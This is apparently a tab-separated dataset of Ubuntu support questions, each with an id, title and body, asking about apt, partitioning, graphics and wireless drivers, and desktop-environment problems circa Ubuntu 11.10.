94857	i deleted the apt folder from /var/cache inlcuding ( i think ) sources.list . what do i do now ?	i initially had a problem with apt-get update . it stopped on 99 % , `` waiting for headers '' . this problem came when attempting to install geogebra following instructions at this page . trying to solve this problem i deleted the apt folder from /var/cache . now apt-get does n't work at all . i have no idea of how to solve this problem . ubuntu works fine but i 'm unable to install new software . please help !
94859	resizing windows to a particular width and height instantly	for some reason , i wish to resize a window to a very large size , 4-5 times larger than my screen size . for now , i am doing it manually by moving the entire window but one corner out of the screen and then pulling the corner to expand the window . however , this is very time taking . is there some way to resize the window to a particular height and width instantly ? ( perhaps from commandline or with the help of some small app or something else )
94867	how can i disable passwordless login ?	i set my account to be allowed to log in without a password . i only wanted this temporarily , but i ca n't seem to change it back to how it was before . how can i make it so that my password is required to log in ? i 'm not talking about auto-login ; at the login prompt i can just hit enter to log into the system . when i go into the user account settings , i do have a password set and the auto-login switch turned off .
94868	preinstalled ubuntu on asus eeepc 1011px blk030u	i 'm trying to figure out what are the criteria behind the installation in object , to see how i can properly use it , improve something or possibly replace it with something installed from scratch to better suit my personal needs . possible questions follows . what are the benefits of an ubuntu installed just in one single primary partition , that is /dev/sda3 ? why the related filesystem is ext3 , though maverick is shipped with a kernel recent enough to handle ext4 ? what 's the purpose of the first primary partition , that is /dev/sda1 ? i noticed it 's fat and when the system is up it is not mounted ... how is the bootstrap supposed to work ? while upgrading packages a dialog box appeared concerning possible destinations for grub , but , though i was pretty sure mbr was a suitable place , i ended up choosing both sda and sda3 : if i 'm not wrong i was not allowed to go on unless i checked them both ... anyway i was not happy to proceed without understanding what i was actually changing , i did n't know what there was initially in the mbr and what there was in the partition boot sector of sda3 ... what can i do in order to perform kind of a `` blind '' system recovery ? i mean , i can install ubuntu from scratch , but what if i wanted to reproduce the exact initial conditions at the very first boot of the machine ? i thought a dump of sda or separate dumps of sda1 and sda3 would be very useful , unfortunately i did n't launch my `` dd '' timely to get those dumps on my own . would you ever make that kind of dumps available ? many thanks in advance
94871	is there a way to use colors to differentiate nautilus windows ?	is there a way to use colors to differentiate nautilus windows that are viewing content on the local machine and nautilus windows that are viewing the content on remote machines ? it would help my organization if i could easily distinguish among different nautilus windows .
94872	downgrading ubuntu from 11.10 to 10.04	i have windows 7 installed on my c drive , ubuntu 11.10 installed on my d drive and then there are couple of more partitions with music n stuff like that . as per the present setting , when i boot into windows7 , i am not shown the partition d ( which has ubuntu in it ) . somehow , the d drive is hidden in windows . also , when i boot up , i have the option to select the os i want to boot into : ) now my questions - why am i not being able to see the d drive when i boot into windows ? i want to downgrade my ubuntu from 11.10 to 10.04 lts due to certain reasons . how do i perform this downgrade ? i have downloaded the copy of 10.04 in iso format . i prefer a clean install actually , rather than the downgrade . please let me know how to keep the windows safe in c drive , and then remove the existing 11.10 from d drive and then install the new 10.04 lts into the clean d drive .
94873	expanding partition	i have a 220g partition with ubuntu . and a empty partition 100g . how can i expand the partition with ubuntu ? i boot from livecd , start gparted , sgrink 1 partition , and could't expand the 2 partition .
94877	artifacts in unity	i 'm using ubuntu 11.10 . sometimes i get strange artifacts on the screen , mainly in the unity toolbar , but also in some applications such as firefox . i ca n't find a way to reproduce the problem , it seems to appear randomly . i can continue working because the system is still usable , but it 's a bit dissapointing . i took a screenshot to clarify what 's happening . can you help me with this ? thank you very much and sorry for my bad english . ps : i 'm using an ati radeon x1550 with the default drivers and unity 3d
94881	how do i use microsoft livechat lx-3000 ?	work gave me a lifechat lx-3000 headset . i plugged it in , and now mixer shows it in a bunch of options . but it does n't matter which one i select , i ca n't get sound to go out to the device , not even in skype which is what i want it for . what am i missing ? : ~ > cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' using xfce4 .
94882	how do i set a wine program ( ex . foxit reader for windows ) as the default program ?	i regularly annotate pdf files and unfortunately there is no good linux pdf reader that supports decent annotations . evince has a very rudimentary and buggy annotation feature . so i 'm stuck using a windows viewer through wine . this works pretty well but , when i simply right-click a file ( in this case a pdf ) , properties , open with and selected foxit reader , the unity launcher icon remained the wine icon instead of the application icon . has anyone set a wine program as the default program for any file ? any ideas ?
94885	how can i submit a netbeans project to ubuntu app developer ?	i have made a java application for ubuntu in netbeans and would like to submit it to the ubuntu software center . but the problem is , when i get the upload form , they ask to choose a file . so what do i do now ? ( netbeans projects are in a folder and not a file ) . so what exactly do i have to upload ? do i just zip it and upload ? please help .
94888	how to install edubuntu 11.10 from a dvd to an exisiting ubuntu	i have downloaded edubuntu 11.10 iso and created a dvd with it , but i already have a pc with ubuntu 11.10 running . how can i install edubuntu from dvd ? my ubuntu does not have an internet connection . so i need to try to install it via the dvd .
94894	problems with android app after pw change	i 'm using u1 on my phone , currently a nexus s with android 4 . everthing worked fine untill i changed my password recently . i can still use u1 on all computers ( even without having to type in the new password - ? ) but it no longer works on the mobile device . the error message when i try to log in : `` could not check time drift : no peer certificate '' . i uninstalled the app , removed the device from the list , reinstalled the app , set the time and date ( and timezone ) to automatic ( as an other thread here adviced ) and tried to log on again - the same error remains . any suggestions ?
94896	why does myphpadmin open in a different browser to the one that is set as default ?	i have 3 browsers installed on my ubuntu 11.10 , chrome , firefox and opera . first i had the problem that software center did not respect my default browser choice . i fixed that by running : sudo update-alternatives -- config x-www-browser but still when i open myphpadmin ( a link that shows up in unity dash ) it insists on opening in opera . config outputs this ( and why does opera has 200 priority and 2 entries in this table ? ) selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/bin/opera 200 auto mode * 1 /usr/bin/chromium-browser 40 manual mode 2 /usr/bin/firefox 40 manual mode 3 /usr/bin/opera 200 manual mode
94902	how can i switch between keyboard layouts by pressing a keyboard shortcut like on windows ?	on windows i am able to switch between keyboard layouts by pressing alt+shift . is there a similar keyboard shortcut in ubuntu ?
94912	can not get sound to work in skype	i 'm battling with ubuntu 11.10 for a few days now , i got most issues resolved , like getting rid of the unity and installing kde . but there is a problem with audio . my pc has an x-fi audio card that 's connected to digital receiver by an optical cable , which always worked . windows was sending dts 5.1 encoded sound via the optical cable , and all 6 channels worked as expected . i managed to get the sound working in ubuntu too , by selecting `` master channel - iec958 '' , which plays stereo sound through digital 5.1 receiver , and it works in most applications - firefox+flash , vlc , shell sounds . but the skype is totally silent . by default it 's left at `` default device '' , but it does n't seem to work on any of the 30 devices that are offered through skype options screen either . i 'm completely lost , and i have no more ideas where to look and how to troubleshoot the problem ... can anyone give me an advice on where to look next ?
94913	is there a way to know what connection i 'm using ?	the reason i ask is because i want to know if i will achive higher speeds if i 'm connected to both than just one connection . also when i 'm gaming ( on the internet ) if i just use the wireless i always drop out after a while , but i do n't if i use both ! i 'm connected to both the wireless and the wired connection . how can i know what connection i 'm using ? am i using both at the same time ? which one is the one i get my ip-address from ? this was an interesting result of nm-tool | route kernel ip routing table destination gateway genmask flags metric ref use iface 192.168.1.0 * 255.255.255.0 u 1 0 0 eth0 192.168.1.0 * 255.255.255.0 u 2 0 0 wlan0 i want to know where the `` main '' amount of packages are sent . so if i 'm connected to both i would like to know which one has the most weight put on it ? the router is a d-link 524 .
94914	mythbuntu using a hvr-1600 and most of the channels are just garbage . how to fix ?	i recently installed mythbuntu on an old hp box with a hvr-1600 . i have installed the new drivers and firmware from linuxtv ( cx18 ) and everything seems to be working . only the local channels are working through the hvr-1600 . from schedules direct my channels line up with inc group through my university . from what i read , inc is supposed to not need a cable box and be able to use on any cable ready tv ( which is true with a direct coax input into my tv ) . how do i get my these additional channels through my tuner card ? are the other channels encrypted ?
94916	why i ca n't see the screen borders ?	i have install ubuntu 11.10 on my pc and all goes right except the screen . i ca n't see the borders of the screen , especially up and down . i have an nvidia geforce gt220 connected to a samsung tv with hdmi .
94923	how to add more space to my ubuntu 10.04 installation	i installed ubuntu 10.04 on my 64 bit machine using wubi.both windows and ubuntu are installed on the c drive . i have the d drive which as over 40gb free . now i want to give that free space to my ubuntu . i read that i can do it with gparted but i am not sure how to . so can someone please explain this process step by step ? looking forward to your positive response . cheers . jayneil . ( jayneil.dalal @ gmail.com )
94924	wired connection not being recognised in ubuntu 10.04 lts	i have windows7 installed on my c drive and ubuntu 10.04 lts on my d drive . when i plud the lan cable ( ethernet cable ) onto the ethernet card of my laptop , windows7 identifies the network correctly without the need for any manual settings and connects me to the network correctly . unfortunately , in ubuntu , even after plugging in the cable , nothing happens ( on the network side ) . it is only scanning for wireless networks it seems , and doesnt bother about the wired networks . i tried adding a new wired connection and manually entered the physical address which was displayed when i connected to the network using windows . i entered the phy address , and told it to use auto dhcp and saved the dialog bog in ubuntu network connection . still there is no change , and ubuntu doesnt seem to recognise anything . please let me know how to work with wired connections using ubuntu , and why my wired cable is not being recognized in ubuntu . thanks . ps : i am pretty new to ubuntu/ linux : )
94925	ubuntu 11.10 ca n't start with gnome-classic	i 've installed gnome-pannel on my 11.10 ubuntu and i would like start with gnome classic . but it 's not working . i 've choose `` gnome classic '' on lightdm , but when my computer start , unity is used . i 've edited /etc/lightdm/lightdm.conf autologin-session=lightdm-autologin user-session=gnome-classic but same problem , my computer start with unity . : /
94926	operating system not found , while booting	i installed burg bootloader , as soon as i start my computer it shows `` operating system not found '' , after i press any key on computer it goes to option screen without any problem , and from there onwards everything works fine .
94930	how do i manage my battery more efficiently ?	my computer : dell xps | i7-2630qm 2.2-2.9 ghz | 4gb ddr3 1333mhz | 2 gb nvidia optimus and , is there a way to use intel 's turboboost ?
94936	10.4 lts only uses one ethernet port , driver fails to compile	lspci reports they are on diffrent irq 's they are both onboard . the intel system has a linux driver but it fails to compile because it can not find linux headers . sudo apt-get install linux-kernel-headers returns that it is installed and up to date ? lspci reports it as ethernet controller : intel corporation device 1502 ( rev 05 ) any ideas ?
94940	drag & drop on launcher icon does not raise focus	i drag file over launcher icon ( running program ) after which program raises and i drop the file . problem i have here is that although program loads the file , it does not gain focus , so i have to alt-tab to it , to gain focus and use program 's actions . this ruins drag & drop purpose for me , as if i have to alt-tab then i could first alt-tab and then drag & drop , instead dragging to launcher , waiting application to raise and dropping the file , and then yet alt-tab . i guess it 's one of those compiz issues , but maybe someone has a tip which compiz setting can solve this problem , if possible ?
94944	asus k53t wo n't boot	today i used wubi to install ubuntu 11.10 on my asus k53t . everything went fine but when i choose ubuntu in boot it shows some lines of text ( too fast to read ) , then shows that nornmal purple screen then flickers and goes black .
94950	after install , lcd monitor is booted in unsupported frequency so i ca n't see the boot menu ( grub )	my graphic card is nvidia and monitor is lg 1280x1024
94956	minecraft screen bug	im new to askubuntu and i need some help on fixing some bug in ubuntu 11.10 / minecraft 1.0.1 ( also happene in previous versions ) . the bug is : screen flashes , everything flickering , hand signs and chest flashing black . the bug is so bad that is preventing me to play the game . please help . i have an ati graphics card , intel i5 quad-core processor .
94958	unity launcher icons squished up under menu bar	the unity launcher on my system has display issues , all the icons are scrunched up under the menu bar . i 've restarted my machine , logged into the gnome session and back into unity , and triple checked the settings in ccsm , but it just stays broken . it appears to be a display issue , if i right click on the `` unused '' grey parts of the launcher bar it brings up the context menu for the applications in the correct places , but it just refuses to display them anywhere but mostly hidden under the menu bar . this is obviously quite irritating . ; ) here 's a screenshot demonstrating the problem :
94969	to which directory should i install a program from a bash script ?	i want to install netbeans 7.0.1 with a bash script from the netbeans website . the default directory chosen by the installer is /home/geoffrey/netbeans-7.0.1 . but i do not think it belongs there .
94972	how to combine similarly structured directories ?	i have two directories that look like this : /folder1/sub1/file1.txt /folder1/sub1/file2.txt /folder1/sub2/file1.txt /folder1/sub2/file2.txt /folder2/sub1/file3.txt /folder2/sub1/file4.txt /folder2/sub2/file3.txt /folder2/sub2/file4.txt i 'd like to copy all of the files from folder2 into folder1 without deleting any of the existing folders , so that i end up with the following : /folder1/sub1/file1.txt /folder1/sub1/file2.txt /folder1/sub1/file3.txt /folder1/sub1/file4.txt /folder1/sub2/file1.txt /folder1/sub2/file2.txt /folder1/sub2/file3.txt /folder1/sub2/file4.txt how can i accomplish this via the terminal ?
94975	ubuntu running too slow on usb stick	since quite some time i 'm running ubuntu on an external hard disk , connected to the pc via usb . this works quite well . i recently got a 32gb usb stick and i installed ( so no live usb ) ubuntu 11.10 on it . i found this more practical because smaller than a hard disk . but the os it is running a lot slower than with the hd . i checked transfer rates and compared with the hd and it looks as if the usb is quicker than the hd . any idea why ? i partitioned the usb stick like this : first a swap area of about 2gb , then the ext4 root partion and last an ntfs partition .
94976	when running ecryptfs-migrate-home -u user i get command not found error	just like in the title , boywithaxe @ xerxes : ~ $ sudo ecryptfs-migrate-home -u test [ sudo ] password for boywithaxe : sudo : ecryptfs-migrate-home : command not found boywithaxe @ xerxes : ~ $ i realise this could be a very stupid question , but googling the string did n't return anything . any ideas ?
94979	save hourly file from curl response	i am following along with twitter 's developer and want to do a very basic call against their filter real-time api . the code below almost gets me there : curl -s -u twitterusername : twitterpassword https : //stream.twitter.com/1/statuses/sample.json -o `` somefile.txt '' my hope is dynamically name the file such that hourly logs of the data are captured . edit : it is worth nothing that i am hoping this command remains open , and that that the data i receive are continuous . i am looking to redirect the output every hour to different files . i am completely new to command line and ubuntu , so i do n't even know where to start . any help will be much appreciated .
94985	ubuntu driver for intel sandybridge/ivybridge graphics	i have installed edubuntu 11.10 on a hp pro 3420 all-in-one pc ( cpu g630 , 64 bit ) . initially i could n't get any display at all . then i searched on internet an applied the trick of adding the option i915.modeset=0 on the boot menu . now i can see the display , but it is only a vesa graphic driver , and the display is really coarse and ugly . i have also tried to install the glasen/intel-driver ( and removed the option i915.modeset=0 ) , but i could n't get the display . does anybody know where to find the proper graphics driver and how to install it ? thanks .
94986	how can i get the hp rc6 ir ( hp sps : 435743-001 ) remote for my laptop to also work on my desktop	i have this remote and it works with xbmc in windows 7 64bit . i would like to know if it is possible to also get this to work with my ubuntu 11.10 64bit system . i am not sure what i need to get it to work correctly because all the hardware is there for it on my laptop . i have a usb bluetooth dongle i would like to use if possible but if i need to but a ir receiver or something like that i can try that too . the reason why i am wanting to do it this way is so i can take advantage of using the remote on both systems . if i ca n't get it to work with my bluetooth dongle then can you suggest somewhere local i can pick up the receiver ? i have the following local stores : radio shack , best buy , target , walmart . i also use online stores like new egg , amazon , ebay as my last option . thanks for any help on this .
94987	likewise 6.1 breaks network on ubuntu 10.04.3	i 'm trying to use powerbroker likewise 6.1 on ubuntu lts 10.04.3 to join to my ad domain . i 've done this in the past before likewise was owned by powerbroker & i can get it to work `` pretty well '' . however , each time i try to install this version , it breaks my network connection . i 'm not sure why or where to look to fix it . any suggestions on where to look ? i 've checked some of the usual network config files likewise modifies : /etc/resolv.conf /etc/hosts /etc/nsswitch.conf they all seem to be ok with respect to the network i 'm on . ifconfig shows inet6 for eth0 but not inet ( it should show inet ) eth0 link encap : ethernet hwaddr 00:0c:29:1c:75 : be inet6 addr : fe80 : :20c:29ff : fe1c:75be/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3159 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:255179 ( 255.1 kb ) tx bytes:936 ( 936.0 b )
94991	windows updated , grub menu is gone	i have/had dual boot with 11.10 and windows 7 . i left my laptop running with windows 7 going and i think it did an automatic update and restarted it 's self . now when i turn it on all i get is a black screen with the blinking cursor in the corner .
94993	anyone know where to find seadas ?	seadas va 6.3 supposedly comes pre-installed on ubuntu 10.04 ( http : //oceancolor.gsfc.nasa.gov/seadas/seadasva.html ) but i ca n't find it . can someone please help me ?
95002	what package do i install to use oxygen in qt4 ?	when you install some qt apps in ubuntu like smplayer and lyx , you can change their appearance eiher with their preferences menu or with the qt-config utility . you can choose between several themes like motif , gtk+ or plastique but you ca n't choose the oxygen style unless you have installed some kde packages and i 'm not sure if you have to install the whole kde desktop . does anyone know which package i have to install to select the oxygen theme for qt4 apps ? summary : what i intend to do is to set the oxygen theme to qt apps in gnome , but without changing gnome apps using oxygen-molecule or another theme
95003	taking screenshots during installation of ubuntu	i am going to install ubuntu server . on numerous websites , i have observed screenshots of the install process . if i would like to take a screenshot of the install process , how can i do it ?
95006	how do i get 11.10 to replace the juniper driver with catalyst	i downloaded catalyst and installed but settings still shows juniper . although i have a radeon 5770 , i think i 'm still in 2d mode . ca n't load the extensions to catalyst and ca n't run flash .
95016	ubuntu 11.10 resets to default settings after reboot	i upgraded to kernel 3.2 last night . now : gnome 3 resets to default after reboot and/or log out . can not change theme , font , etc through gnome tweak tool . can not add any keyboard shortcuts that carryover across reboots . mouse freezes after reboot . have to run synaptics trackpad manually twice from the applications lens before it starts but has default settings . same with unity.created new user . same problem . selected old kernel from boot . problem persists . no changes to ui are present after logout or reset . in essence , any changes made to ubuntu get reset on reboot . as if i am running a live cd . every time i boot up , i have the same settings as whatever came out of the box . is this a user rights issue ? some file ( s ) can not be overwritten because of insufficient privileges ( i am admin on this machine ) edit : tried gnome-settings-daemon in terminal $ gnome-settings-daemon gtk-warning ** : theme parsing error : gtk-widgets.css:1597:20 : invalid animation description glib-gio-message : using the 'memory ' gsettings backend . your settings will not be saved or shared with other applications . ** warning ** : you can only run one xsettings manager at a time ; exiting ** warning ** : unable to start xsettings manager : could not initialize xsettings manager . ** warning ** : name taken or bus went away - shutting down two xsetting managers ? how do i get rid of one of them ? what is the other one ? kindly help ( ubuntu noob )
95022	which type of virtualbox networking should i use ?	i 'm trying to use virtualbox on my mac to host a couple of vms . host os : mac osx 10.7.2 guest os : ubuntu 11.10 server 32-bit each vm should be able to connect to the internet ( this is needed primarily to install software ) my host browser should be able to connect to the guest vms . also i need to be able to ssh to the guest vms . this is why i want each vm to have a static ip address . this will also allow the vms to connect to each other , say for database connectivity . i have done this with vmware fusion . however , vmware has lately bitten me too often and destroyed so much work that i want to try virtualbox . but i 'm not a network guru and do n't know which type of networking i want . so what i 'm asking is simple : which type of networking should i use ? nat , bridging , or what ? and of course if anyone has a link to any documentation of how to do what i want , that would be greatly appreciated . thanks , ge
95023	ubuntu 11.10 recently installed , purple screen , then text shown	i have recently installed ubuntu 11.10 in my hp pavillion a1520n . however , with any version of ubuntu that i tried to install , a purple screen shows up , and after a black page with white text thats starting all these services , but after it doesnt boot the system . i 'm new to this and i have no clue what to do to fix it . can you help me ?
95027	keyboard randomly stops working . switch to console mode and back fixes it	as the title says i 'm on 10.04 and sometimes the keyboard will just plain stop working . mouse still works fine . a quick < ctrl > + < alt > + f4 then < ctrl > + < alt > + f7 and the keyboard works again . is this a known issue ? am i just doing something dumb and not realizing it ? thanks .
95030	improve vnc connection speed over lan	i am wondering if there is anyway to increase the performance of a vnc connection . i have an server setup ( ubuntu ) with a wired connection to the router . its connected to the house sound system . i have tried to play movies over the connection so i get good sound quality and can setup my laptop anywhere but its way too low fps ( prob about 10 or 15 ) . other than buying a faster router or having a wired connection from the laptop to it , is there any software way i can speed up the fps ? would increasing the priority on the server make much difference ? my guess is no . i think the main bottleneck is the wireless .
95033	is it better to use the ubuntu supplied ati drivers or the drivers direct from amd ?	i have a ati radeon hd 6300 graphics card , and i 'm wondering if it is better for me to use the drivers available via additional drivers or if i should download and install the driver direct from amd ?
95037	what is the best way to install python packages ?	what is the best way to install python packages in ubuntu 11 ? i am a recent convert to ubuntu and want to learn best practices . for context , i am looking to install the tweeststream package , but i did not see it in my synaptic package manager . also , i am very new to programming but usually can follow along with code samples .
95038	how do i use mutter with gnome shell ?	i 'm new to the whole gnome shell . i recently installed it , and i read somewhere a while ago that compiz is completely broken with gnome shell so i have to use mutter instead . i have no idea where to start though ; i sifted through google and could n't find any tutorials on it . so far , i have brought up a terminal and did sudo mutter -- replace ; this works okay , but i do n't know how to replace it permanently so i always have mutter enabled . secondly it seems to kill the whole shell : i ca n't move my cursor to the top left and access my applications like i could before . is there an easier way ? also , how do i access the effects like in compiz ? i 'm sorry , i 'm pretty new .
95042	how to delete an annotation in evince ?	i have discovered with great surprise that evince 2.32.0 allows for annotations on a pdf . to my dismay however , i have found no means to delete annotations ( no button , no menu , no right-click-menu , nada ) . how can i delete an annotation then ?
95052	inspircd with gnutls	i 'm receiving an error trying to setup an irc server with inspircd using gnutls for ssl connections . ubuntu server 11.10 ( kernel 3.0.0-14-server ) inspircd-1.1.22+azeitao r0 logfile ; == > /var/log/inspircd.log < == fri jan 13 12:03:44 2012 : done reading configuration file . fri jan 13 12:03:44 2012 : unable to load /usr/lib/inspircd/modules/m_ssl_gnutls.so : /usr/lib/inspircd/modules/m_ssl_gnutls.so : undefined symbol : gnutls_x509_crt_get_issuer_dn fri jan 13 12:03:44 2012 : there was an error loading the module 'm_ssl_gnutls.so ' : loader/linker error : /usr/lib/inspircd/modules/m_ssl_gnutls.so : undefined symbol : gnutls_x509_crt_get_issuer_dn the gnutls packages that are currently on the system ; dpkg -- get-selections | grep gnutls gnutls-bin install libcurl3-gnutls install libgnutls-dev install libgnutls26 install libgnutlsxx26 install libneon27-gnutls install inspircd.conf excerpt < module name= '' m_ssl_gnutls.so '' > < bind address= '' 192.168.1.2 '' port= '' 6697 '' type= '' clients '' ssl= '' gnutls '' > < ssl_cert name= '' cert1 '' certfile= '' /etc/ssl/certs/server.cer '' keyfile= '' /etc/ssl/private/server.key '' >
95057	only 1 workspace in unity 2d	i 'm using unity 2d . when i click on workspaces , it zooms out , but the screen is black where the other 3 workspaces should be . when i try clicking in the black area , nothing happens .
95062	how to make orage calendar application stay below the active window ?	i am using xubuntu . i am using the orage calendar application set up like a widget on my desktop . however , whenever i open any window of any application , this widget always stays on top and hides sections of the active application . is there a way to avoid this and make sure that orage widget always stays below the active window ?
95063	wireless not recognised on a compaq presario cq57	hello i just bought a new compaq presario cq57-356sa laptop , and i 'm having problems enabling the wireless . when i start the laptop the wi-fi icon glows orange ( off ) , when windows boots up somewhere during the splash screen it goes blue ( on ) . however , natty does n't recognize my wireless driver at all saying `` ath0 - no wireless extension '' . wireless works fine on 11.10 , but i do n't really like and and would rather stick with gtk2 . the wireless driver is called ralink rt5390 . i 've tried loading kernel 3 onto natty , but that did n't resolve my problem . any help would be appreciated .
95066	how to install edubuntu package in ubuntu ?	i have installed on my pc ubuntu 10.10 and edubuntu 11.04 in a usb . i had a problem with the installation of edubuntu so i had to install ubuntu 10.10 . i want to install the desktop and all programs in ubuntu . how i can do it ?
95067	google chrome unity icon does not restore after minimizing	after minimizing the google chrome window , clicking on the chrome icon in the unity sidebar does n't restore the window . additionally , the the icon seems to behave more like a launcher : no white indicators showing whether a window is open or not , and clicking on the icon just opens another instance of chrome . no other icon does this . can anyone help me here ?
95075	why is 'broadcast ' appearing twice in my notification menu ?	i am using ubuntu 11.10 and gwibber/broadcast has started appearing twice in my notification menu as shown in the attached image : on a related note , even with the option to start gwibber at log is unchecked , gwibber still starts . i have tried uninstalling gwibber but when i reinstall it still reverts back to what i see above . when i look at system monitor i can see three instances of gwibber-service running , but i do not know if that is related . thanks !
95076	can i use kernel 3.2 in ubuntu 11.04 ?	my kernel is now 2.6.38-13 in ubuntu 11.04 . if i want to use kernel 3.2 , do i need to compile some drivers ( such as hdaps , ati video card ) freshly ? is there any ppa for kernel 3.2 in ubuntu 11.04 ?
95077	ca n't send video to background of impress slide	in libreoffice impress , i wanted to show texts on top of a video as the background , but the video refused to go back when i tried to arrange the objects . everything else can be arranged .
95081	`` can not determine current directory '' while building haskell	i 'm trying to install haskell on ubuntu 11.10 and i 'm following the instructions on this website : https : //gist.github.com/1524859 but when i type ./configure i get an error message saying : checking for path to top of build tree ... utils/ghc-pwd/dist/build/tmp/ghc-pwd : error while loading shared libraries : libgmp.so.3 : can not open shared object file : no such file or directory configure : error : can not determine current directory anyone know what i 'm doing wrong ?
95082	how to make numpad key binds such as ctrl + alt + 1 work in kde ?	i am running latest kubuntu kde , was trying to set up virtual desktop switching key bindings same as i used in gnome : ctrl+alt+number_of_desktop . i always used numpad to press the number , but this does not want to work in kde . when i press numbers above the qwerty keys they work ! but numpad does not . can you suggest where i should dig ?
95084	why would firefox produce images like this ?	very often firefox will load images that are cut oddly like the one attached . refreshing does n't fix it . chromium does n't do it . how could i fix this ?
95085	xubuntu 11.10 crashes when running any gnome service	after booting a clean install of xubuntu 11.10 64 bit , everything works fine . screenshot : but when i run any gnome app ( i ran nautilus in the following example ) , the xfce kind of crashes and leaves me with a strange , unusable desktop , like this : when in options - > start-up services i enable `` run gnome services on start-up '' and reboot the system , the desktop crashes immediately after log-in , which means something from the gnome services crashes xfce , or at least partially destroys it . any idea how to fix this ? edit : googling i managed to find this bug report , which also describes my situation . edit2 : running nautilus -- no-desktop helps , but does n't resolve the problem with loading gnome services on start-up .
95091	wireless stopped working on a gateway lt2805u	gateway lt2805u netbook running ubuntu 10.04 . wireless suddenly stopped working . rfkill shows no output . and the wireless card shows `` unclaimed '' . card is an atheros ( ar9285 i think ) . my hardware switch is the f3 key but it has no effect . if i load ubuntu 11.10 it all seems to work fine , however i would like to stay at 10.04 . also , i am brand new to ubuntu so keep that in mind .
95092	firefox scrolling slow after installing nvidia proprietary software ?	i recently installed nvidia proprietary software via `` additional hardware '' and suddenly the scrolling in firefox has slowed down meaning on a web-page when i roll my center mouse ball , the page scrolls down with delay . earlier when i was using the default open-source driver nouveau , i was not seeing the problem . chrome , however , still works fine . what can be done ?
95093	how to check if checkbox-unity from ppa : unity-team/ppa succesfully send my report ?	i used the checkbox-unity survey to test beta unity 5.0 in precice . completing the survey took me a couple of hours because i thoroughly described the problems i discovered . at the end of the survey i did n't notice that there was a text-field to enter the launchpad login detail and clicked next . an error prompted that sending of the info failed , giving me no option to enter my login-detail and retrying . clicking 'previous ' regenerated the results and got me back to the login-details . filling my login ( no password prompt ) and clicking next displayed 'successful ' ( within a hundred of a second ) but i have the feeling noting has been send . is there a way to verify successful submission ? i still have the results in a submission.xml file but relaunching checkbox-unity again starts the survey all over again . i hoped my contribution would be helpful , but if the report is n't submitted , it is useless and disappointing . i found out about the test via http : //www.omgubuntu.co.uk/2012/01/unity-5-0-ready-for-testing/
95094	how can i use the gnome clock applet ( or equivalent ) in xfce ?	i 'm using xfce on ubuntu 11.04 ; both the default clock and the orage applet are vastly inferior to the gnome 2 clock i was used to that lets you click and display both a calendar and timezones and weather forecasts for locations round the world ; i 'd like to have that functionality . xf-applet is meant to allow gnome panel applets in xfce and works fine , but the clock applet is not one of those listed ... why is this ? is it possible to use the clock applet somehow ? if not , is there some equivalent xfce thing that combines clock , multiple timezones , and weather forecasts in a single applet ?
95097	can not update linux kernel from 2.6.38.3+ to 3.2.0	evervryone . first , please forgive my bad english . and i 'm using google cr-48 and installed ubuntu 11.10 in it . recently , i have updated ubuntu which used command sudo apt-get update & & sudo apt-get upgrade . also , i have installed vmware in it . unfortunely , when i open it , it pops up a vmware kernel module updater . after i searched , the kernel ( ? ) is lost in /usr/src/ . so i updated the kernel 3.2 which published recently directly . but i followed these web-site procedure below . the website are below respectively . howto compile and install linux kernel 3.8 / 3.0 in ubuntu 12.10 , 12.04 , 11.10 , 11.04 and 10.04 how to install linux kernel 3.9 raring in ubuntu 13.04 , 12.10 , 12.04 , 11.10 , 11.04 after i followed these steps , and reboot the cr-48 . it still fail and can not update kernel to 3.2 when i used the command in terminal uname -r and it still shows me 2.6.38.3+ . after i did some research , i found a module or kernel ( ? ) ( i do n't know and i 'm so sorry about that ) in /lib/modules/ and there is a folder called 2.6.38.3+ . and i found a post linux kernel wo n't update to 2.35.25 in here and i followed these steps , it 's still can not update the kernel . so what should i do now ? thanks for everyone helping .
95098	setting up hard drive partition for windows xp	i 'm using gparted on ubuntu via the live cd ( 11.10 ) to organize the partition to setup windows xp ( sp3 ( latest ) ) and im unsure of a : how to use gparted properly , and b : what settings to use for the partition to get it identifiable for the windows xp installation ( to my understanding its hard to windows to see the hard drive after having a linux distro installed on it . my ultimate goal is to use the whole partition for windows , and erasing everything on the drive . i understand i need to make the new partition an ntsf file system , but what about the other settings ?
95099	kde : chrome ctrl+i keys binding does not open up devtools	using latest kubuntu kde , i try to open up devtools in chrome by hitting ctrl+i as given in the tools menu . but it does not work . ctrl+j however opens javascript console . can you suggest a solution ? is there a way to find out which key binding overrides the chrome key bindings ?
95100	left touchpad button does n't work on an eee pc 900	left touchpad button does n't work at all at my asus eee pc 900 using ubuntu 11.10 . have searched for the solution , found out that that 's not only my problem , but have n't found a solution . is there anyone who solved this problem and can tell me how to do this ? )
95102	ati radeon 9250 driver problem	i have a ati radeon 9250 video card ( 250mb ) and is a pci-express slot . my problem is i do n't have the video driver install on my ubuntu 11.10 ( 32 , non-64 ) , i try to install the video card driver , but i did n't , i thing the problem is the driver , because i see that driver only work on a 64bit os ( or maybe my bad english it show me that ) . well , i need some help to know if i did not do something rite ( to install the driver correctly ) , because i 'm a little new on ubuntu and i do n't want go back to windows only for this driver . p.s . : i do n't know if is possible to contact the amd support or ubuntu support , to report this problems , maybe they can fix the problem making a new driver for this device .
95104	how to lock desktop icons on xfce	i 'm wondering if is there any way to have a functionality like in kde : i can set icons to be `` locked '' , so they will not change of location . but in xfce when i start a game in 800*600 resolution and then return to the desktop it 's all messed up . any solution to this ? thank 's for your time
95107	how do i disable the default window restore animation ?	under unity in ubuntu 11.10 , the default animation for restoring a minimised window is a kind of swooping zoom . what setting in compizconfig settings manager do i need to change to disable this ?
